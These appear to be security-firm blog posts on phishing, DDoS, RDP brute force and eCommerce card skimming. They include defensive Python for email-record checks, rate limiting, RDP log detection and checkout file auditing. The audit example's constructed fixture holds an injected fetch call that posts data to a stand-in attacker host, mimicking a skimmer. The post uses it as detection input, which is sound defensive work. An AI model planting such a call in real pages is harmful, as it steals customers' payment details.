Blog Post: Top 3 Common Networking Attacks

Prism Infosec’s Senior Security Consultant, Aaron, reviews the “Top 3 Common Networking Attacks”

During this unprecedented period when much of the world’s population is affected by lockdown measures and limited activities, cyber criminals have intensified their attacks. The state of fear and uncertainty has provided them with a new “business opportunity” and whilst most of us are spending more time on the Internet than ever before, several types of cyber-attacks have seen a drastic increase over the last few months.

1. Phishing Attacks

Amid this chaotic situation, many people are seeking out COVID-19 related information online, hoping to find reliable guidelines to stay safe and well. At the same time, hackers are taking advantage of this by ramping up “phishing” attacks that trick internet users into opening malicious files or links that purport to provide COVID-19 information.

Cyber criminals do this by impersonating trusted organisations and sending out convincing emails containing attachments that are laden with malicious payloads. On opening, the attachments execute the code and allow an attacker unauthorised access to system resources and data, along with the capability to execute further attacks on other networked devices or resources.

In other phishing attacks, unsuspecting users are tricked into following links that lead the user to realistic login pages for trusted brands. On logging in, the valid usernames and passwords are captured and later used by criminals to conduct financial fraud and impersonation. 

Phishing attacks can be mitigated in several ways:

  • Implement an anti-spoofing policy with malware and spam filters on mail servers to keep malicious emails away from employees.
  • Implement email security measures such as SPF, DKIM and DMARC. These increase assurance that a sender is genuinely associated with the domain it claims, allow receiving servers to detect when that domain has been impersonated, and can prevent such emails from reaching inboxes.
  • Train employees to identify phishing attempts and on the actions to take when they suspect phishing or have already opened an attachment or followed a link.
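The SPF and DMARC records that the second point relies on are plain DNS TXT strings, and a weak record gives almost no protection. The following added example (written for this page, not Prism Infosec’s own tooling) parses sample records and flags the settings that undermine them: an SPF policy ending in `+all`, a DMARC policy of `p=none`, a partial `pct=`, or no reporting address. The domains and records are constructed for the example; `lookup_txt` is a hypothetical stand-in for a real DNS resolver. DKIM is not checked here because a DKIM record lives under a selector name that cannot be discovered from the domain alone.

```python
"""Flag weak SPF and DMARC settings in a domain's TXT records."""
import re

# Constructed sample TXT records; not real DNS data for any live domain.
SAMPLE_RECORDS = {
    "example.test": "v=spf1 include:_spf.mail.test ip4:203.0.113.0/24 -all",
    "_dmarc.example.test": "v=DMARC1; p=reject; rua=mailto:dmarc@example.test; pct=100",
    "weak.test": "v=spf1 +all",
    "_dmarc.weak.test": "v=DMARC1; p=none; pct=50",
}

# Mechanisms that cost a DNS lookup; SPF permits at most 10 per evaluation.
LOOKUP_MECHANISMS = {"include", "a", "mx", "exists", "redirect", "ptr"}


def lookup_txt(name):
    """Stand-in resolver (assumption); swap in a real DNS client for live checks."""
    return SAMPLE_RECORDS.get(name)


def mechanism_name(mechanism):
    # Strip the qualifier (+ - ~ ?) and any argument after ':', '=' or '/'.
    return re.split(r"[:=/]", mechanism.lstrip("+-~?"), 1)[0].lower()


def assess_spf(record):
    findings = []
    if record is None or not record.lower().startswith("v=spf1"):
        return ["no SPF record: any host may claim to send for this domain"]
    mechanisms = record.split()[1:]
    final = mechanisms[-1].lower() if mechanisms else ""
    if final in ("+all", "all"):
        findings.append("SPF ends in '+all': every sender passes, the policy is void")
    elif final == "?all":
        findings.append("SPF ends in '?all': neutral result gives no protection")
    elif final == "~all":
        findings.append("SPF ends in '~all': softfail only, rely on DMARC to enforce")
    lookups = sum(1 for m in mechanisms if mechanism_name(m) in LOOKUP_MECHANISMS)
    if lookups > 10:
        findings.append(f"{lookups} lookup mechanisms exceed the limit of 10 (permerror)")
    return findings


def parse_dmarc(record):
    tags = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags


def assess_dmarc(record):
    findings = []
    if record is None or not record.upper().startswith("V=DMARC1"):
        return ["no DMARC record: receivers are never told to reject spoofed mail"]
    tags = parse_dmarc(record)
    policy = tags.get("p", "none").lower()
    if policy == "none":
        findings.append("DMARC p=none: monitoring only, spoofed mail is still delivered")
    elif policy == "quarantine":
        findings.append("DMARC p=quarantine: spoofed mail is junked rather than rejected")
    pct = int(tags.get("pct", "100"))
    if pct < 100:
        findings.append(f"DMARC pct={pct}: the policy applies to only {pct}% of mail")
    if "rua" not in tags:
        findings.append("DMARC has no rua= address: no aggregate reports, abuse goes unseen")
    return findings


def assess_domain(domain, resolver=lookup_txt):
    """Return {'spf': [...findings], 'dmarc': [...findings]} for one domain."""
    return {
        "spf": assess_spf(resolver(domain)),
        "dmarc": assess_dmarc(resolver("_dmarc." + domain)),
    }
```

`assess_domain("example.test")` returns empty finding lists for both records, while `weak.test` produces one SPF finding and three DMARC findings. A `p=none` record is the most common real-world weakness: it is the right first step while aggregate reports are reviewed, but it must be moved to `quarantine` and then `reject` before it stops anything.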

2. Denial of Service (DoS) and Distributed Denial of Service (DDoS) Attack

At a time when Internet connections are required more than ever, a successful Denial of Service attack will have a more damaging impact than ever before.

A Distributed Denial-of-Service (DDoS) attack is one in which a collection of computers is infected with malicious code and controlled as a group (a botnet). The botnet is then directed at another Internet service, such as a web site, which is flooded with traffic to deny service to legitimate users. The outcome of a DDoS attack is operational disruption, achieved when systems and services are taken offline. Furthermore, attackers can disrupt organisations by threatening to shut down business services unless large sums of money are paid.

Denial of Service attacks can be mitigated by:

  • Utilising a Web Application Firewall (WAF)
  • Implementing rate limiting
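Rate limiting, as applied by a WAF or reverse proxy, caps how many requests one client may make in a time window so that a flood from a single source cannot crowd out everyone else. The added example below (not code from the original post) implements a per-client sliding-window limiter and replays it over constructed request timestamps: one client browsing at a normal pace and one source sending 200 requests in ten seconds. The IP addresses and timings are made up for the illustration.

```python
"""Per-client sliding-window rate limiter, replayed over constructed request timestamps."""
from collections import deque


class SlidingWindowLimiter:
    """Allow at most `limit` requests per client within any `window_seconds` span.

    Each client has a deque of timestamps for its recently accepted requests; a
    request is rejected when the deque is already full inside the window.
    """

    def __init__(self, limit, window_seconds):
        self.limit = limit
        self.window = window_seconds
        self.history = {}

    def allow(self, client, now):
        queue = self.history.setdefault(client, deque())
        # Drop timestamps that have aged out of the window.
        while queue and now - queue[0] >= self.window:
            queue.popleft()
        if len(queue) >= self.limit:
            return False
        queue.append(now)
        return True


def replay(limiter, requests):
    """requests: iterable of (timestamp, client). Returns {client: (allowed, rejected)}."""
    stats = {}
    for timestamp, client in sorted(requests):
        allowed, rejected = stats.get(client, (0, 0))
        if limiter.allow(client, timestamp):
            allowed += 1
        else:
            rejected += 1
        stats[client] = (allowed, rejected)
    return stats


# Constructed sample: a legitimate client at a steady pace and one flooding source.
SAMPLE_REQUESTS = (
    [(t * 2.0, "198.51.100.10") for t in range(10)]           # 10 requests over 20 s
    + [(0.5 + t * 0.05, "203.0.113.7") for t in range(200)]   # 200 requests in 10 s
)


def demo(limit=20, window_seconds=10):
    """Run the sample through a limiter of 20 requests per 10 seconds."""
    return replay(SlidingWindowLimiter(limit, window_seconds), SAMPLE_REQUESTS)
```

With the sample traffic, the steady client has all 10 requests accepted and the flooding source gets 20 through before the remaining 180 are rejected. Two caveats a practitioner should keep in mind: this logic protects the application tier only and cannot absorb a bandwidth-level flood, which needs upstream or provider-side filtering; and a distributed attack spreads its requests across many source addresses, so per-client limits must be combined with global limits and WAF rules on request patterns.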

It is crucial that organisations understand Denial of Service attacks and are always prepared to defend against them.

3. Remote Desktop Server Attack

Recently, many organisations have turned to Microsoft’s Remote Desktop Protocol (RDP) as a method of allowing remote workers access to corporate resources. The number of corporate services that need to be remotely accessible has increased sharply, along with the requirement to support remote working; however, so has the number of reported RDP attacks.

RDP is a simple and cost-efficient method of facilitating remote working and access to corporate resources such as applications or desktops. However, the protocol is not sufficiently secure to be exposed to the internet. Without adequate security configurations in place, it can be easily compromised allowing an external attacker to gain a foothold into internal networks.

RDP attacks typically involve brute-forcing usernames and passwords, attempting all possible combinations until the correct one is found. Upon discovery of a correct combination, an attacker can gain full desktop access to a computer in the target network.

If your organisation must enable RDP, it is crucial that the following protection measures are in place:

  • Unique, long and random passwords are in use to protect the systems
  • Two factor authentication
  • Limiting the use of RDP to devices using a Corporate VPN
  • Ensure security options such as Network Level Authentication are enabled
  • Avoid connectivity of the RDP service to a corporate domain

If RDP access is not required, then it should be disabled and access to port 3389 should be blocked at the firewall.
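The password guessing described above leaves a clear trace: a run of failed logons (Windows Security event 4625) from one source address, all with logon type 10 (RemoteInteractive, i.e. RDP), often across several usernames, sometimes followed by a success (event 4624) from the same address. The added example below (written for this page, not Prism Infosec’s own code) parses a constructed, simplified rendering of such events and raises one alert per source that crosses a failure threshold inside a time window. The timestamps, usernames and addresses are made up; the event IDs, logon type and field names mirror the real Security log.

```python
"""Flag RDP password-guessing in constructed Windows Security log lines."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed, simplified one-line rendering of Security log events. Real events
# carry these fields inside EVTX/XML; the field names mirror the real ones.
SAMPLE_EVENTS = """\
2020-05-04T09:00:01 EventID=4625 LogonType=10 TargetUserName=admin IpAddress=203.0.113.5
2020-05-04T09:00:03 EventID=4625 LogonType=10 TargetUserName=admin IpAddress=203.0.113.5
2020-05-04T09:00:04 EventID=4625 LogonType=10 TargetUserName=administrator IpAddress=203.0.113.5
2020-05-04T09:00:06 EventID=4625 LogonType=10 TargetUserName=backup IpAddress=203.0.113.5
2020-05-04T09:00:09 EventID=4625 LogonType=10 TargetUserName=svc_sql IpAddress=203.0.113.5
2020-05-04T09:00:12 EventID=4625 LogonType=10 TargetUserName=jsmith IpAddress=203.0.113.5
2020-05-04T09:00:15 EventID=4624 LogonType=10 TargetUserName=jsmith IpAddress=203.0.113.5
2020-05-04T09:01:00 EventID=4625 LogonType=10 TargetUserName=agreen IpAddress=10.0.0.23
2020-05-04T09:05:00 EventID=4624 LogonType=10 TargetUserName=agreen IpAddress=10.0.0.23
2020-05-04T09:10:00 EventID=4625 LogonType=3 TargetUserName=agreen IpAddress=10.0.0.23
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) EventID=(?P<id>\d+) LogonType=(?P<lt>\d+) "
    r"TargetUserName=(?P<user>\S+) IpAddress=(?P<ip>\S+)$"
)


def parse(text):
    """Turn the one-line rendering into dicts; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        events.append({
            "ts": datetime.fromisoformat(m["ts"]),
            "id": int(m["id"]),
            "logon_type": int(m["lt"]),
            "user": m["user"],
            "ip": m["ip"],
        })
    return events


def detect_rdp_bruteforce(events, threshold=5, window=timedelta(minutes=1)):
    """One alert per source IP with >= threshold RDP (LogonType 10) failures inside
    `window`, noting whether a successful logon from that IP followed the burst."""
    failures = defaultdict(list)
    successes = defaultdict(list)
    for event in sorted(events, key=lambda e: e["ts"]):
        if event["logon_type"] != 10:
            continue  # RemoteInteractive only; other logon types are not RDP sessions
        if event["id"] == 4625:
            failures[event["ip"]].append(event)
        elif event["id"] == 4624:
            successes[event["ip"]].append(event)

    alerts = []
    for ip, fails in failures.items():
        start = 0
        for end in range(len(fails)):
            # Slide `start` forward until the burst fits inside the window.
            while fails[end]["ts"] - fails[start]["ts"] > window:
                start += 1
            if end - start + 1 >= threshold:
                burst = fails[start:end + 1]
                later = [s for s in successes[ip] if s["ts"] >= burst[-1]["ts"]]
                alerts.append({
                    "ip": ip,
                    "failures": len(burst),
                    "users": sorted({f["user"] for f in burst}),
                    "success_after": later[0]["user"] if later else None,
                })
                break  # one alert per source is enough
    return alerts
```

On the sample, `203.0.113.5` is reported after its fifth failure, with four distinct usernames tried and a later success as `jsmith`, which is the combination that should be escalated immediately; `10.0.0.23` never crosses the threshold. One caveat for production use: on hosts with Network Level Authentication enabled, failed RDP logons are commonly recorded with logon type 3 rather than 10, because authentication completes before a session exists, so a deployed rule usually counts both types on RDP-enabled hosts.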

Conclusion

In conclusion, cyber-crime is bound to increase for the rest of 2020 as cyber criminals are constantly engineering new methods to attack business operations. Hence, it is crucial that businesses stay ahead of cyber threats by maintaining good security practices, such as:

  • Regularly review network security – Audit the security controls in place to ensure that network perimeters are well protected and unnecessary access is removed. Continue to monitor all systems and networks for unusual activity.
  • Maintain user education and awareness – Constantly remind employees of the importance of both physical and cyber security awareness. Develop home working policies and train employees to adhere to them.
  • Ensure malware prevention is in place – Ensure that all anti-virus solutions are updated daily and anti-malware policies are in place.
  • Maintain secure configuration on all systems – Make sure that all servers and end user devices are patched up to date. Ensure that all remote working devices are subject to integrity checks before they are allowed access into corporate networks.
  • Secure remote access configurations – All remote solutions should utilise secure authentication and encryption technologies and have multifactor authentication enforced where possible.
  • Monitor user activities and privileges – Continue to monitor user activities for potentially malicious behaviour and ensure that the principle of least privilege is actively applied.
  • Incident response plan – Always be alert and prepared for potential cyber-attacks, and ensure that an incident response plan is in place to deal with any emergencies.

Blog Post: Home Working Cyber Security Guidance

During these uncertain times, Prism Infosec are doing their utmost to support the community with information security guidance and advice.

To start, Prism Infosec has published a blog post (longer read) and quick guide (key points) as essential updates for ensuring systems and data availability without compromising security.

A PDF of our full blog post can be downloaded from here.

For the quick guide, this can be downloaded here.

Blog Post: eCommerce Websites: Assessing the Risk

The last year has seen a significant rise in the quantity and impact of attacks on eCommerce (eCom) websites, which has cumulatively resulted in the exposure of millions of personal data records and, in some cases, cardholder data records.

In many cases, relatively simple attacks have been used to compromise eCom applications despite the best efforts of Information Security staff and standards bodies such as the PCI Security Standards Council (SSC). The potential impacts of data breaches include class action lawsuits, brand/reputational damage, fines from regulators such as the Information Commissioner’s Office (ICO) and card scheme fines from Mastercard and Visa.

Looking further into the recent breaches, there is no doubt that firms such as British Airways, Ticketmaster and Quora will have invested significantly in security and compliance. So where did it all go wrong? Are the standards not strong enough, or have the threats increased in sophistication? Why are breaches which affect millions of people so common?

What can organisations do to ensure that they minimise the risk of a successful eCom attack?

After investigating security across many eCom sites, it is apparent that gaps really do exist in many cases. One problem is that there are so many different ways to attack an eCom site, for example:

  • The underlying platform or environment hosting the eCom application;
  • Libraries, packages or dependencies used by the application;
  • The core web application functionality itself;
  • Network security;
  • Configuration settings across all systems and applications;
  • Remote access and management of the environment, including third parties; and
  • The Content Management System (CMS)

Many organisations only defend against a sub-set of these attack points or, in some cases, mistakenly believe that one or more contracted third parties are covering certain areas when this may not actually be the case.

Should an attacker gain unauthorised access to an underlying server involved in the delivery of a web site or the CMS application, then it can be straightforward to modify pages and code associated with critical pages such that information entered by a customer is duplicated to another web site under the control of the attacker. 

The issue associated with this particular attack is that the data (sensitive details such as personal data or credit card data) is not necessarily stored on the compromised server itself, but is nevertheless duplicated to a second malicious web site controlled by the attacker. The eCom site will appear to continue to process transactions ‘normally’ and so the attack can remain undetected for some time, harvesting many thousands of stolen records over a period of weeks or months.

This means that it is vitally important to ensure that access to the eCom servers and associated management systems is strongly protected, both from internal and external attackers. Additionally, detection of unexpected changes to core code and of anomalous calls in client transactions are measures that could be used to detect and stop such an attack.
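The two detective controls named above, change detection on core code and spotting calls to hosts the checkout page should never talk to, can both be expressed as simple checks. The added example below (written for this page, not Prism Infosec’s own tooling) keeps a SHA-256 baseline of the checkout files and compares the current copies against it, and separately extracts every script source, form action and URL literal from those files and reports any host that is not on the site’s allowlist. The file contents, the allowlist and the injected `fetch` call are all constructed for the illustration.

```python
"""Baseline hashes plus a host allowlist for a constructed checkout page."""
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed files standing in for the checkout template and its script.
BASELINE_FILES = {
    "checkout.html": b'<html><body><form action="/pay" method="post">...</form>'
                     b'<script src="/static/checkout.js"></script></body></html>',
    "static/checkout.js": b"document.forms[0].addEventListener('submit', validate);",
}
CURRENT_FILES = {
    "checkout.html": BASELINE_FILES["checkout.html"],
    # Constructed unauthorised change: a line that copies form data off-site.
    "static/checkout.js": BASELINE_FILES["static/checkout.js"]
                          + b"fetch('https://stats.example.invalid/c', {method:'POST'});",
}
# Hosts the checkout flow is allowed to reference (constructed for the example).
ALLOWED_HOSTS = {"shop.example.test", "pay.example.test"}

URL_RE = re.compile(r"https?://[^\s'\"()<>]+")


def digest_tree(files):
    """Map each path to the SHA-256 hex digest of its content."""
    return {path: hashlib.sha256(content).hexdigest() for path, content in files.items()}


def changed_paths(baseline, current):
    """Paths whose digest differs from the baseline, including added or removed files."""
    before, after = digest_tree(baseline), digest_tree(current)
    return sorted(p for p in set(before) | set(after) if before.get(p) != after.get(p))


class _RefCollector(HTMLParser):
    """Collect script src and form action attributes from HTML."""

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        attributes = dict(attrs)
        if tag == "script" and attributes.get("src"):
            self.refs.append(attributes["src"])
        if tag == "form" and attributes.get("action"):
            self.refs.append(attributes["action"])


def referenced_hosts(files):
    """Every hostname referenced by HTML attributes or URL literals in the files.

    Relative references such as /pay have no hostname and are treated as same-origin.
    """
    hosts = set()
    for path, content in files.items():
        text = content.decode("utf-8", errors="replace")
        refs = list(URL_RE.findall(text))
        if path.endswith(".html"):
            collector = _RefCollector()
            collector.feed(text)
            refs.extend(collector.refs)
        for ref in refs:
            host = urlparse(ref).hostname
            if host:
                hosts.add(host)
    return hosts


def unexpected_hosts(files, allowed=ALLOWED_HOSTS):
    return sorted(referenced_hosts(files) - allowed)


def audit(baseline, current, allowed=ALLOWED_HOSTS):
    """Both checks together; an empty result on both keys means nothing to act on."""
    return {
        "changed": changed_paths(baseline, current),
        "unexpected_hosts": unexpected_hosts(current, allowed),
    }
```

Running `audit(BASELINE_FILES, CURRENT_FILES)` reports `static/checkout.js` as changed and `stats.example.invalid` as an unexpected host, while auditing the baseline against itself reports nothing. The hash check only works if the baseline is stored and compared somewhere the web server account cannot write to; the allowlist check has browser-side equivalents in a Content Security Policy (`script-src`, `connect-src`, `form-action`) and Subresource Integrity, which block the off-site call in the customer’s browser rather than merely reporting it.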

Prevention

An online web application associated with the delivery of sales transactions can minimise the risk of a successful attack using effective eCom security management, such as:

  • Prevention of attacks with defence-in-depth (multi-layer security)
  • Detection and alerting of anomalies in eCom operation
  • Fast response to attacks to minimise the risk to the business

Regular testing and scanning of the eCom site is an essential basic and should be conducted frequently, with anomalies remediated as a priority – after all, attackers are testing and scanning all eCom sites across the Internet continuously.

A challenge mentality should be present in the teams managing the site’s infrastructure, code (whether bespoke, off the shelf eCom software / cloud service or a hybrid of the two) and cyber security. This is preferable to considering penetration testing and vulnerability scanning as “tick box exercises” – even issues rated as low risk should be reviewed and managed as part of an effective risk management regime. 

It is also recommended to conduct regular focused eCom risk assessments on new or existing sites, or when changing underlying application frameworks or adding new features such as voucher codes or customer product reviews.

An effective eCom risk assessment should cover:

  • Platform/technologies in use (hosting, network and software)
  • Effective management of any third parties
  • Resilience of eCom platform
  • Sensitive data stored, processed or transmitted, compliance obligations
  • eCom code and content development, testing and deployment
  • Logging/monitoring, testing and assurance

Baseline security practices such as patching and network security are quite clearly not sufficient on their own to ensure adequate protection of an eCom website; many different threats and attacks need to be considered.

An eCom risk assessment, combined with regular testing and scanning, will ensure that the many risks of an eCom breach are understood, properly managed and mitigated as far as possible.